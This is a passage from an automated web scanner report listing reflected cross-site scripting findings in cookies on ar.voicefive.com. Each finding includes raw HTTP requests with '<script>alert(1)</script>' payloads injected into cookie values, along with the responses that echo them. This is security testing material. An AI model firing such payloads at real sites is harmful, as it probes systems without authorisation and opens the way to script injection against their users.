Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...
3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f989f<script>alert(1)</script>c2d7913ec5b was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...
3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload a3957<script>alert(1)</script>d386d8ef993 was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "UID": '4a757a7-24.143.206.42-1305663172', "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...
3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload 60d46<script>alert(1)</script>aec37149a73 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...
3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 88eb1<script>alert(1)</script>6e1f2d203c5 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...
3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload ae91f<script>alert(1)</script>9d1c4ccadb1 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...
3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 49e92<script>alert(1)</script>e9b3d058372 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...
3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 96c60<script>alert(1)</script>4bda17080c7 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

